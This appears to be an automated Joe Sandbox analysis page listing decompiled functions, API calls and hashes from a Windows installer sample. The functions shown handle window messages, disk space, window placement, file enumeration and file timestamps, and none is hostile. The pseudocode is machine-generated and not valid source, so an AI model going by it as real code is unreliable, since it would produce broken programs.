Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$File$First$CloseNext
String ID:
API String ID: 2001080981-0
Opcode ID: 78db060d0ff8595c9ad911d788eff98285c939c0b52c7fa355805a1a434184b3
Instruction ID: f4f0d5ffc9ce120d58c1fac62e782ea2759e54c072aa6b2b6e56672e70db2b2b
Opcode Fuzzy Hash: 78db060d0ff8595c9ad911d788eff98285c939c0b52c7fa355805a1a434184b3
Instruction Fuzzy Hash: CF715E7090021DAFDF22DFA5CD81ADFBBB9EF49304F1080AAE408A3291D6799B45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004551C4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 235
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004551C4(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v164;
				char _v168;
				void* _t57;
				intOrPtr _t75;
				intOrPtr _t80;
				void* _t107;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t122;
				intOrPtr _t125;
				intOrPtr _t153;
				intOrPtr _t159;
				intOrPtr _t160;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t181;
				void* _t186;
				void* _t187;
				intOrPtr _t188;
				void* _t194;

				_t194 = __fp0;
				_t184 = __esi;
				_t183 = __edi;
				_t186 = _t187;
				_t188 = _t187 + 0xffffff5c;
				_push(__esi);
				_push(__edi);
				_v168 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = __edx;
				_push(_t186);
				_push(0x455580);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				_push(_t186);
				_push(0x455544);
				_push( *[fs:edx]);
				 *[fs:edx] = _t188;
				_t125 =  *_v8;
				_t57 = _t125 - 0x4a;
				if(_t57 == 0) {
					_t59 =  *((intOrPtr*)(_v8 + 8));
					_t153 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)))) - 0x800;
					__eflags = _t153;
					if(__eflags == 0) {
						_push(_t186);
						_push(0x45536f);
						_push( *[fs:edx]);
						 *[fs:edx] = _t188;
						E00403628( &_v12,  *((intOrPtr*)(_t59 + 4)),  *((intOrPtr*)(_t59 + 8)), __eflags);
						_push(_t186);
						_push(0x45532d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t188;
						 *0x4ae28c = 1;
						_push(_t186);
						_push(0x455312);
						_push( *[fs:eax]);
						 *[fs:eax] = _t188;
						E004717F8(_v12,  *((intOrPtr*)(_t59 + 4)),  &_v16);
						__eflags = 0;
						_pop(_t159);
						 *[fs:eax] = _t159;
						_push(E00455319);
						 *0x4ae28c = 0;
						return 0;
					} else {
						_t160 = _t153 - 1;
						__eflags = _t160;
						if(_t160 == 0) {
							_push(_t186);
							_push(0x455463);
							_push( *[fs:edx]);
							 *[fs:edx] = _t188;
							E00402740( *((intOrPtr*)(_t59 + 8)), 0x94,  &_v164);
							_push(_t186);
							_push(0x455421);
							_push( *[fs:eax]);
							 *[fs:eax] = _t188;
							__eflags =  *0x4ae298;
							if( *0x4ae298 == 0) {
								E00408DF0("Cannot evaluate variable because [Code] isn\'t running yet", 1);
								E00403264();
							}
							E004036A4( &_v168, 0x80,  &_v144);
							_t75 =  *0x4ae298; // 0x21fdcf0
							E00487818(_t75, _t125, _v152, _v156, _t183, _t184, _t194,  &_v16, _v168, _v148);
							 *((intOrPtr*)(_v8 + 0xc)) = 1;
							_pop(_t165);
							 *[fs:eax] = _t165;
							_t166 =  *0x48defc; // 0x0
							_t80 =  *0x48def8; // 0x0
							E00430E30(_t80, _t125, 0x700, _t166, _t183, _t184, _v16);
							_pop(_t167);
							 *[fs:eax] = _t167;
						} else {
							_t172 = _t160 - 1;
							__eflags = _t172;
							if(_t172 == 0) {
								_push(_t186);
								_push(0x4554ba);
								_push( *[fs:edx]);
								 *[fs:edx] = _t188;
								E00403548(0x48def0);
								E00403628(0x48def0,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 4)),  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 8)), __eflags);
								 *((intOrPtr*)(_v8 + 0xc)) = 1;
								_pop(_t176);
								 *[fs:eax] = _t176;
							} else {
								__eflags = _t172 == 1;
								if(_t172 == 1) {
									_push(_t186);
									_push(0x45550b);
									_push( *[fs:edx]);
									 *[fs:edx] = _t188;
									E00403548(0x48def4);
									E00403628(0x48def4,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 4)),  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 8)), __eflags);
									 *((intOrPtr*)(_v8 + 0xc)) = 1;
									_pop(_t181);
									 *[fs:eax] = _t181;
								}
							}
						}
						goto L21;
					}
				} else {
					_t107 = _t57 - 0xbb6;
					if(_t107 == 0) {
						 *0x48deec = 0;
						 *0x48def8 = 0;
						 *0x48df00 = 1;
						 *0x48df01 = 0;
						PostMessageA(0, 0, 0, 0);
					} else {
						_t110 = _t107 - 1;
						if(_t110 == 0) {
							 *0x48df00 = 1;
							_t111 = _v8;
							__eflags =  *((intOrPtr*)(_t111 + 4)) - 1;
							 *0x48df01 =  *((intOrPtr*)(_t111 + 4)) == 1;
							PostMessageA(0, 0, 0, 0);
						} else {
							if(_t110 == 2) {
								SetForegroundWindow( *(_v8 + 4));
							} else {
								_push( *((intOrPtr*)(_v8 + 8)));
								_push( *(_v8 + 4));
								_push(_t125);
								_t122 =  *0x48defc; // 0x0
								_push(_t122);
								L00405F44();
								 *((intOrPtr*)(_v8 + 0xc)) = _t122;
							}
						}
					}
					L21:
					_pop(_t168);
					 *[fs:eax] = _t168;
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E00455587);
					E00403548( &_v168);
					return E00403568( &_v16, 2);
				}
			}

0x004551c4
0x004551c4
0x004551c4
0x004551c5
0x004551c7
0x004551ce
0x004551cf
0x004551d2
0x004551d8
0x004551db
0x004551de
0x004551e3
0x004551e4
0x004551e9
0x004551ec
0x004551f1
0x004551f2
0x004551f7
0x004551fa
0x00455200
0x00455204
0x00455207
0x00455286
0x0045528b
0x0045528b
0x00455291
0x004552af
0x004552b0
0x004552b5
0x004552b8
0x004552ca
0x004552d1
0x004552d2
0x004552d7
0x004552da
0x004552dd
0x004552e6
0x004552e7
0x004552ec
0x004552ef
0x004552f8
0x004552fd
0x004552ff
0x00455302
0x00455305
0x0045530a
0x00455311
0x00455293
0x00455293
0x00455293
0x00455294
0x00455380
0x00455381
0x00455386
0x00455389
0x0045539d
0x004553a4
0x004553a5
0x004553aa
0x004553ad
0x004553b0
0x004553b7
0x004553c5
0x004553ca
0x004553ca
0x004553e7
0x00455403
0x00455408
0x00455410
0x00455419
0x0045541c
0x00455446
0x0045544c
0x00455451
0x00455458
0x0045545b
0x0045529a
0x0045529a
0x0045529a
0x0045529b
0x00455474
0x00455475
0x0045547a
0x0045547d
0x00455485
0x0045549e
0x004554a6
0x004554af
0x004554b2
0x004552a1
0x004552a1
0x004552a2
0x004554c8
0x004554c9
0x004554ce
0x004554d1
0x004554d9
0x004554f2
0x004554fa
0x00455503
0x00455506
0x00455506
0x004552a2
0x0045529b
0x00000000
0x00455294
0x00455209
0x00455209
0x0045520e
0x0045521d
0x00455226
0x0045522b
0x00455232
0x00455241
0x00455210
0x00455210
0x00455211
0x0045524b
0x00455252
0x00455255
0x00455259
0x00455268
0x00455213
0x00455216
0x00455279
0x00455218
0x0045551d
0x00455524
0x00455528
0x00455529
0x0045552e
0x0045552f
0x00455537
0x00455537
0x00455216
0x00455211
0x0045553a
0x0045553c
0x0045553f
0x0045555c
0x0045555f
0x00455562
0x0045556d
0x0045557f
0x0045557f

APIs

PostMessageA.USER32 ref: 00455241
PostMessageA.USER32 ref: 00455268
SetForegroundWindow.USER32(?,00000000,00455544,?,00000000,00455580), ref: 00455279
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00455544,?,00000000,00455580), ref: 0045552F

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 004553B9

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: 5c5ac1eddd3d602a1ee3ffd1d2e739ced74d48b7e175e839e9a59a629ebf1d82
Instruction ID: 95b111a220d62185ca6afdd142f4d940c15e3d42b846e94de273ceb19253328e
Opcode Fuzzy Hash: 5c5ac1eddd3d602a1ee3ffd1d2e739ced74d48b7e175e839e9a59a629ebf1d82
Instruction Fuzzy Hash: 4F91EF34604A04EFD715DF65D961F69BBEAEB49304F21C4AAF804977A2D738AE04CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00454498 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00454498(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				char _v32;
				struct HINSTANCE__* _t37;
				signed int _t50;
				struct HINSTANCE__* _t70;
				intOrPtr _t84;
				void* _t92;
				void* _t94;
				void* _t97;

				_v28 = 0;
				_v32 = 0;
				_v8 = __ecx;
				_t92 = __edx;
				_t94 = __eax;
				_push(_t97);
				_push(0x454585);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97 + 0xffffffe4;
				_push("GetDiskFreeSpaceExA");
				_t37 = GetModuleHandleA("kernel32.dll");
				_push(_t37);
				L00405AA4();
				_t70 = _t37;
				if(_t70 == 0) {
					E0042C8F0(_t94,  &_v28);
					E0042C9B8(_v28,  &_v32);
					E0042C614(_v32,  &_v28);
					_t50 = GetDiskFreeSpaceA(E00403880(_v28),  &_v12,  &_v16,  &_v20,  &_v24);
					asm("sbb ebx, ebx");
					if( ~( ~_t50) != 0) {
						E004301C0(_v16 * _v12, _t92, _v20);
						E004301C0(_v16 * _v12, _v8, _v24);
					}
				} else {
					E0042C614(_t94,  &_v28);
					_t70->i(E00403880(_v28), _t92, _v8, 0);
					asm("sbb eax, eax");
				}
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x45458c);
				return E00403568( &_v32, 2);
			}

0x004544a3
0x004544a6
0x004544a9
0x004544ac
0x004544ae
0x004544b2
0x004544b3
0x004544b8
0x004544bb
0x004544be
0x004544c8
0x004544cd
0x004544ce
0x004544d3
0x004544d7
0x00454514
0x0045451f
0x0045452a
0x00454538
0x00454541
0x00454547
0x00454554
0x00454565
0x00454565
0x004544d9
0x004544e5
0x004544f3
0x004544f7
0x004544fb
0x0045456c
0x0045456f
0x00454572
0x00454584

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00454585), ref: 004544C8
6D2B5550.KERNEL32(00000000,kernel32.dll,GetDiskFreeSpaceExA,00000000,00454585), ref: 004544CE
GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,00000000,kernel32.dll,GetDiskFreeSpaceExA,00000000,00454585), ref: 00454538

Strings

GetDiskFreeSpaceExA, xrefs: 004544BE
kernel32.dll, xrefs: 004544C3

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550DiskFreeHandleModuleSpace
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 509413488-3712701948
Opcode ID: b6483b5ee3d0346f159b185c52af97ae63ec2584e7aaeb3b34e3d6e6d116d660
Instruction ID: ee69e7ae25aeeea0998975ace1f002d7bd1a950fc69788e101bcd8bc85b7e071
Opcode Fuzzy Hash: b6483b5ee3d0346f159b185c52af97ae63ec2584e7aaeb3b34e3d6e6d116d660
Instruction Fuzzy Hash: B4212671B0020EABCB01DFE5C8D29AFB7BCEB48715F50457AB501E7281D6789E458A94

Uniqueness

Uniqueness Score: -1.00%

Function 00417EE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417EE8(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void _v64;
				int _t51;
				void* _t52;
				int _t58;
				int _t62;

				_t58 = __ecx;
				_t62 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x24)) || __ecx !=  *((intOrPtr*)(__eax + 0x28)) || _a8 !=  *((intOrPtr*)(__eax + 0x2c))) {
					L4:
					if(E00418590(_t52) == 0 || IsIconic( *(_t52 + 0xc0)) != 0) {
						 *(_t52 + 0x24) = _t62;
						 *(_t52 + 0x28) = _t58;
						 *((intOrPtr*)(_t52 + 0x2c)) = _a8;
						 *((intOrPtr*)(_t52 + 0x30)) = _a4;
						if(E00418590(_t52) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0xc0),  &_v48);
							E00414874(_t52,  &_v64);
							memcpy( &(_v48.rcNormalPosition),  &_v64, 4 << 2);
							SetWindowPlacement( *(_t52 + 0xc0),  &_v48);
						}
					} else {
						SetWindowPos( *(_t52 + 0xc0), 0, _t62, _t58, _a8, _a4, 0x14);
					}
					return E00414678(_t52);
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x30))) {
						return _t51;
					}
					goto L4;
				}
			}

0x00417ef1
0x00417ef3
0x00417ef5
0x00417efa
0x00417f15
0x00417f1e
0x00417f4c
0x00417f4f
0x00417f55
0x00417f5b
0x00417f67
0x00417f69
0x00417f7b
0x00417f85
0x00417f95
0x00417fa2
0x00417fa2
0x00417f30
0x00417f45
0x00417f45
0x00000000
0x00417f09
0x00417f09
0x00417f0f
0x00417fb4
0x00417fb4
0x00000000
0x00417f0f

APIs

IsIconic.USER32 ref: 00417F27
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417F45
GetWindowPlacement.USER32(?,0000002C), ref: 00417F7B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417FA2

Strings

,, xrefs: 00417F69

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 499d3834d6b5db29a22e0f47dab4578c443018d11d48153a0622ce0220785e8f
Instruction ID: 311bdc00790280313cc464f85d3e4d0a04fc091c1b109fb2a90286c771725ff4
Opcode Fuzzy Hash: 499d3834d6b5db29a22e0f47dab4578c443018d11d48153a0622ce0220785e8f
Instruction Fuzzy Hash: 09212AB1A04204ABCF10EF69C8C1EDB77A8AB48314F15456AFD19EB246D738E845CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0045DEF4 Relevance: 7.6, APIs: 5, Instructions: 120
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0045DEF4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				int _v12;
				void* _v16;
				char _v20;
				struct _WIN32_FIND_DATAA _v340;
				char _v344;
				char _v348;
				void* _t49;
				void* _t77;
				intOrPtr _t89;
				intOrPtr _t92;
				void* _t97;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				intOrPtr _t106;

				_t78 = __ecx;
				_t104 = _t105;
				_t106 = _t105 + 0xfffffea8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v344 = 0;
				_v348 = 0;
				_v8 = 0;
				_v20 = 0;
				_t77 = __ecx;
				_t100 = __edx;
				_t102 = __eax;
				_push(_t104);
				_push(0x45e0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				_t107 = __ecx;
				if(__ecx != 0) {
					E0042CA40(__ecx, __ecx,  &_v344);
					_push(_v344);
					E0042C614(_t100,  &_v348);
					_pop(_t97);
					if(E0042C73C(_v348, _t77, _t78, _t97, _t100, _t102, _t107) == 0) {
						E0042CA18(_t77, _t78,  &_v8);
					}
				}
				_v12 = SetErrorMode(1);
				_push(_t104);
				_push(0x45e073);
				_push( *[fs:eax]);
				 *[fs:eax] = _t106;
				E0042C614(_t100,  &_v344);
				E004036C4( &_v344, 0x45e0c0);
				_v16 = FindFirstFileA(E00403880(_v344),  &_v340);
				if(_v16 == 0xffffffff) {
					__eflags = 0;
					_pop(_t89);
					 *[fs:eax] = _t89;
					_push(0x45e07a);
					return SetErrorMode(_v12);
				} else {
					_push(_t104);
					_push(0x45e055);
					_push( *[fs:eax]);
					 *[fs:eax] = _t106;
					do {
						_t49 = E0045CA08( &_v340);
						_t111 = _t49;
						if(_t49 != 0) {
							E004036A4( &_v20, 0x104,  &(_v340.cFileName));
							if(E0042C73C(_v20, _t77, 0x104, _v8, _t100, _t102, _t111) != 0 && E0045D760( *((intOrPtr*)(_a4 - 4)), _v20, _t102) == 0) {
								E0045D668( *((intOrPtr*)(_a4 - 4)), _v20, _t102, 0, 0, 0);
							}
						}
					} while (FindNextFileA(_v16,  &_v340) != 0);
					_pop(_t92);
					 *[fs:eax] = _t92;
					_push(0x45e05c);
					return FindClose(_v16);
				}
			}

0x0045def4
0x0045def5
0x0045def7
0x0045defd
0x0045defe
0x0045deff
0x0045df02
0x0045df08
0x0045df0e
0x0045df11
0x0045df14
0x0045df16
0x0045df18
0x0045df1c
0x0045df1d
0x0045df22
0x0045df25
0x0045df28
0x0045df2a
0x0045df34
0x0045df3f
0x0045df48
0x0045df53
0x0045df5b
0x0045df62
0x0045df62
0x0045df5b
0x0045df6e
0x0045df73
0x0045df74
0x0045df79
0x0045df7c
0x0045df8e
0x0045df9e
0x0045dfb4
0x0045dfbb
0x0045e05c
0x0045e05e
0x0045e061
0x0045e064
0x0045e072
0x0045dfc1
0x0045dfc3
0x0045dfc4
0x0045dfc9
0x0045dfcc
0x0045dfcf
0x0045dfd5
0x0045dfda
0x0045dfdc
0x0045dfec
0x0045dffe
0x0045e025
0x0045e025
0x0045dffe
0x0045e03a
0x0045e040
0x0045e043
0x0045e046
0x0045e054
0x0045e054

APIs

SetErrorMode.KERNEL32(00000001,00000000,0045E0A8), ref: 0045DF69
FindFirstFileA.KERNEL32(00000000,?,00000000,0045E073,?,00000001,00000000,0045E0A8), ref: 0045DFAF
FindNextFileA.KERNEL32(000000FF,?,00000000,0045E055,?,00000000,?,00000000,0045E073,?,00000001,00000000,0045E0A8), ref: 0045E035
FindClose.KERNEL32(000000FF,0045E05C,0045E055,?,00000000,?,00000000,0045E073,?,00000001,00000000,0045E0A8), ref: 0045E04F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 57442afee4419b1d50bfbaf5f1af8c694b826538d3a338e2f11ef4f2f3517b00
Instruction ID: 3a976878209395eab88a851e065c39672c09d3fc7a7bc3c56a70336765bf3655
Opcode Fuzzy Hash: 57442afee4419b1d50bfbaf5f1af8c694b826538d3a338e2f11ef4f2f3517b00
Instruction Fuzzy Hash: C4417971A006189FDB21DF66CC85A9EB7B8EF48705F5044AAF804E7382D67C9E48CE58

Uniqueness

Uniqueness Score: -1.00%

Function 0045DB60 Relevance: 7.6, APIs: 5, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0045DB60(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				int _v8;
				void* _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				void* _t49;
				intOrPtr _t60;
				intOrPtr _t63;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xfffffeb4;
				_v336 = 0;
				_t66 = __edx;
				_t49 = __eax;
				_push(_t68);
				_push(0x45dc91);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				_v8 = SetErrorMode(1);
				_push(_t68);
				_push(0x45dc71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E0042C614(_t66,  &_v336);
				E004036C4( &_v336, 0x45dca8);
				_v12 = FindFirstFileA(E00403880(_v336),  &_v332);
				if(_v12 == 0xffffffff) {
					_pop(_t60);
					 *[fs:eax] = _t60;
					_push(0x45dc78);
					return SetErrorMode(_v8);
				} else {
					_push(_t68);
					_push(0x45dc53);
					_push( *[fs:eax]);
					 *[fs:eax] = _t70;
					do {
						if(E0045CA08( &_v332) != 0) {
							E004036A4( &_v336, 0x104,  &(_v332.cFileName));
							E0045D668( *((intOrPtr*)(_a4 - 4)), _v336, _t49, 0, 0, 0);
						}
					} while (FindNextFileA(_v12,  &_v332) != 0);
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x45dc5a);
					return FindClose(_v12);
				}
			}

0x0045db61
0x0045db63
0x0045db6e
0x0045db74
0x0045db76
0x0045db7a
0x0045db7b
0x0045db80
0x0045db83
0x0045db8d
0x0045db92
0x0045db93
0x0045db98
0x0045db9b
0x0045dbad
0x0045dbbd
0x0045dbd3
0x0045dbda
0x0045dc5c
0x0045dc5f
0x0045dc62
0x0045dc70
0x0045dbdc
0x0045dbde
0x0045dbdf
0x0045dbe4
0x0045dbe7
0x0045dbea
0x0045dbf7
0x0045dc10
0x0045dc23
0x0045dc23
0x0045dc38
0x0045dc3e
0x0045dc41
0x0045dc44
0x0045dc52
0x0045dc52

APIs

SetErrorMode.KERNEL32(00000001,00000000,0045DC91), ref: 0045DB88
FindFirstFileA.KERNEL32(00000000,?,00000000,0045DC71,?,00000001,00000000,0045DC91), ref: 0045DBCE
FindNextFileA.KERNEL32(000000FF,?,00000000,0045DC53,?,00000000,?,00000000,0045DC71,?,00000001,00000000,0045DC91), ref: 0045DC33
FindClose.KERNEL32(000000FF,0045DC5A,0045DC53,?,00000000,?,00000000,0045DC71,?,00000001,00000000,0045DC91), ref: 0045DC4D
SetErrorMode.KERNEL32(?,0045DC78,0045DC71,?,00000001,00000000,0045DC91), ref: 0045DC6B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$ErrorFileMode$CloseFirstNext
String ID:
API String ID: 3300381671-0
Opcode ID: 2195dfeef245148aa855689ff73322b656d2a2f596cd473620ea4e1816b94b9e
Instruction ID: aa5e3b924dc6f30bc68a8fe23e2d34734619f11adc0ff5b164dbd648a97e99f3
Opcode Fuzzy Hash: 2195dfeef245148aa855689ff73322b656d2a2f596cd473620ea4e1816b94b9e
Instruction Fuzzy Hash: B731A270A00608AFDB21DF61CC51BDEB7BCDF49705F5144BAB908E3392D678AE44CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00477D2C Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00477D2C(signed int __eax) {
				signed int _t8;
				void* _t11;
				intOrPtr _t21;
				signed int _t24;
				void* _t25;

				_t8 = __eax;
				_t24 = __eax;
				if( *0x4adf64 != 0) {
					_t8 = E00418590( *0x4adf64);
					if(_t8 != 0) {
						if( *((char*)( *0x4adf64 + 0xc7)) == 0 ||  *((char*)(_t24 + 0x1b5)) != 0) {
							L5:
							_t11 = 0;
						} else {
							_t21 =  *0x48d628; // 0x21d2410
							if(IsIconic( *(_t21 + 0x20)) == 0) {
								_t11 = 1;
							} else {
								goto L5;
							}
						}
						_t25 = _t11;
						_t8 = GetWindowLongA(E004183F8( *0x4adf64), 0xfffffff0) & 0xffffff00 | (_t14 & 0x10000000) != 0x00000000;
						if(_t25 != _t8) {
							if(_t25 == 0) {
								return ShowWindow(E004183F8( *0x4adf64), 0);
							}
							return ShowWindow(E004183F8( *0x4adf64), 5);
						}
					}
				}
				return _t8;
			}

0x00477d2c
0x00477d2d
0x00477d36
0x00477d41
0x00477d48
0x00477d56
0x00477d73
0x00477d73
0x00477d61
0x00477d61
0x00477d71
0x00477d77
0x00000000
0x00000000
0x00000000
0x00477d71
0x00477d79
0x00477d92
0x00477d97
0x00477d9b
0x00000000
0x00477dbe
0x00000000
0x00477daa
0x00477d97
0x00477d48
0x00477dc4

APIs

IsIconic.USER32 ref: 00477D6A
GetWindowLongA.USER32 ref: 00477D88
ShowWindow.USER32(00000000,00000005,00000000,000000F0,004ADF64,0047762C,00477658,00000000,00477678,?,?,00000001,004ADF64), ref: 00477DAA
ShowWindow.USER32(00000000,00000000,00000000,000000F0,004ADF64,0047762C,00477658,00000000,00477678,?,?,00000001,004ADF64), ref: 00477DBE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: bee34f21e1887c5c58d5faed8c17502e83f3230d412d958119f73cd5178b6203
Instruction ID: 9562a1e82bdd3b1ca890772f211df974c1dcec169affa1dd4bf1b188884a0154
Opcode Fuzzy Hash: bee34f21e1887c5c58d5faed8c17502e83f3230d412d958119f73cd5178b6203
Instruction Fuzzy Hash: C8017570A0C3409EE720B765DD45FF727895F09314F48447AB8169B6A3DA7D8C44875D

Uniqueness

Uniqueness Score: -1.00%

Function 00406FEC Relevance: 6.0, APIs: 4, Instructions: 37
timefileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406FEC(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00403880(__eax),  &_v336);
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}

0x00407007
0x0040700f
0x00407045
0x00407045
0x00407011
0x00407012
0x0040701e
0x00000000
0x00407020
0x0040702b
0x00407043
0x00000000
0x00000000
0x00407043
0x0040701e
0x00407053

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00407007
